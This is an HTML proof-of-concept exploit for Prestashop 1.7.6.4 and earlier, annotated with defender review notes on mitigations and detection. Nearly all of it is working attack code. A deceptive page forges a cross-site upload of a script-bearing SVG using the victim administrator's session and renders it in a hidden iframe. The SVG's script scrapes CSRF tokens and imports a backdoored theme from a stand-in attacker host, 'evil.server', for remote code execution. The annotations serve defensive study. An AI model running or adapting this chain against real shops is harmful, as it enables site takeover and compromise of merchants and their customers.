<html>
<!--
Prestashop <= 1.7.6.4 single-click RCE exploit
Written by Sivanesh Ashok | @sivaneshashok | stazot.com
For more details, visit https://stazot.com
Change the values of the 3 variables marked as "change this"
-->
<!-- CSRF PoC - generated by Burp Suite Professional -->
<!--
Review notes (defender's reading of this PoC):
- The page is meant to be opened in a browser that already holds a Prestashop
  back-office session: every XMLHttpRequest below sets withCredentials = true,
  so the victim's cookies ride along on cross-site requests.
- Step 1 (submitRequest, 1.5 s after load): a cross-site multipart POST to
  <admin_url>/filemanager/upload.php uploads an SVG file that contains <script>.
  The body carries only the fields "path", "path_thumb" and "file"; there is no
  anti-CSRF token in it, which is presumably the condition the PoC relies on.
- Step 2 (hidden iframe, 4 s after load): the uploaded SVG is rendered from the
  target's own origin (/img/cms/exploit.svg), so its script runs same-origin,
  can scrape the theme-import CSRF tokens from admin pages, and then submits
  "import from web" pointing at theme_url.
- The "RCE" outcome named in the header is whatever the theme import does with
  the fetched archive; that effect is asserted by the author, not shown here.
Mitigations this chain depends on being absent: a CSRF token (or SameSite
session cookie / Origin check) on filemanager/upload.php; refusing SVG as an
image upload, or serving uploads from a separate origin with
"Content-Disposition: attachment" or a sandboxing Content-Security-Policy;
restricting theme import to trusted sources.
Detection: a GET to /filemanager/dialog.php followed within seconds by a POST
to /filemanager/upload.php whose Origin/Referer is not the admin host, and
uploaded .svg files whose content includes "<script".
-->
<body>
<h3>This is totally a legit page. Just keep reading this for a minute :)</h3>
<!-- Replaces the address-bar URL with "/" without navigating away. -->
<script>history.pushState('', '', '/')</script>
<script>
// Configuration: target is the shop origin, admin_url its back-office path,
// theme_url the archive the final theme import is told to fetch.
var target = "http://localhost"; //change this
var admin_url = "/admin123ab45cd"; //change this
var theme_url = "http://evil.server/backdoor-theme.zip"; //change this - link to the malicious theme zip file
// Credentialed GET to the filemanager dialog before the upload.
// NOTE(review): the page does not show why this request is needed; presumably
// it initialises filemanager state the upload endpoint expects - confirm
// against the application.
var xhr0 = new XMLHttpRequest();
xhr0.open("GET", target+admin_url+"/filemanager/dialog.php");
xhr0.withCredentials = true;
xhr0.send();
// Builds and sends the cross-site multipart upload. The boundary and field
// layout are a literal captured request body; its only fields are path,
// path_thumb and file (filename exploit.svg, declared as image/svg+xml).
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", target+admin_url+"/filemanager/upload.php", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------6487332036660663652470259777");
xhr.withCredentials = true;
var body = "-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"path\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"path_thumb\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"exploit.svg\"\r\n" +
"Content-Type: image/svg+xml\r\n" +
"\r\n" +
// Start of the uploaded SVG document ('<' is written as \x3c so the HTML
// parser does not see tags inside this string).
"\x3csvg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\"\x3e\r\n" +
"\r\n" +
// The SVG loads jQuery from a third-party CDN; a CSP script-src on the
// upload-serving path that does not allow that origin would stop the payload.
"\t\x3cscript xlink:href=\"https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js\"\x3e\x3c/script\x3e\r\n" +
"\t\r\n" +
"\t\x3cscript\x3e\r\n" +
"\t\r\n" +
// async:false makes the three requests below run in sequence, so the
// variables filled in by each callback are available to the next request.
"\t$.ajaxSetup({async: false});\r\n" +
"\r\n" +
"\tvar target = \'" + target + "\';\r\n" +
"\tvar admin_url = \'" + admin_url + "\';\r\n" +
"\tvar theme_url = \'" + theme_url + "\';\r\n" +
"\tvar import_url = \'\';\r\n" +
"\tvar import_token = \'\';\r\n" +
"\t\r\n" +
// Fetches the theme-import page and scrapes the 44-character _token from its
// HTML. This only works because the SVG runs on the target origin: the CSRF
// token is readable same-origin, which is what the token was meant to prevent
// from a cross-site page.
"\t$.get(target+admin_url+\'/index.php/improve/design/themes/import\', function( my_var0 ) {\r\n" +
"\t\r\n" +
"\t\tvar tmp = my_var0.match(/_token(.{44})/g);\r\n" +
"\t\ttmp = tmp.toString().split(\"=\");\r\n" +
"\t\ttmp = tmp[1];\r\n" +
"\t\timport_url = target+admin_url+\'/improve/design/themes/import?_token=\'+tmp;\r\n" +
"\r\n" +
"\t}, \'html\');\r\n" +
"\r\n" +
// Fetches the import form with that token and scrapes the form's own
// import_theme[_token] value.
"\t$.get(import_url, function( my_var1 ) {\r\n" +
"\r\n" +
"\t\tvar tmp = my_var1.match(/import_theme__token(.{101})/g);\r\n" +
"\t\ttmp = tmp.toString().split(\' \');\r\n" +
"\t\ttmp = tmp[3].toString().split(\'=\\\"\');\r\n" +
"\t\timport_token = tmp[1];\r\n" +
"\r\n" +
"\t}, \'html\');\r\n" +
"\r\n" +
// Submits "import from web" with theme_url and the scraped form token.
"\tvar themeUploadData = new FormData();\r\n" +
"\tthemeUploadData.append(\'import_theme[import_from_web]\', theme_url);\r\n" +
"\tthemeUploadData.append(\'import_theme[_token]\', import_token);\r\n" +
"\r\n" +
"\t$.ajax({\r\n" +
"\t\turl: import_url,\r\n" +
"\t\tdata: themeUploadData,\r\n" +
"\t\tcache: false,\r\n" +
"\t\tcontentType: false,\r\n" +
"\t\tprocessData: false,\r\n" +
"\t\tmethod: \'POST\'\r\n" +
"\t});\r\n" +
"\r\n" +
"\t\x3c/script\x3e\r\n" +
"\r\n" +
"\x3c/svg\x3e\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777--\r\n";
// Converts the body string to bytes one char code at a time and sends it as
// a Blob.
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
// 1.5 s after load: send the upload.
window.setTimeout(function(){
submitRequest();
}, 1500);
// 4 s after load: render the uploaded SVG from the target origin in a hidden
// iframe. The path /img/cms/ is where the PoC expects the filemanager to have
// stored the file; that location is not verified on this page.
window.setTimeout(function(){
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = target+"/img/cms/exploit.svg";
document.body.appendChild(iframe);
}, 4000);
</script>
</body>
</html>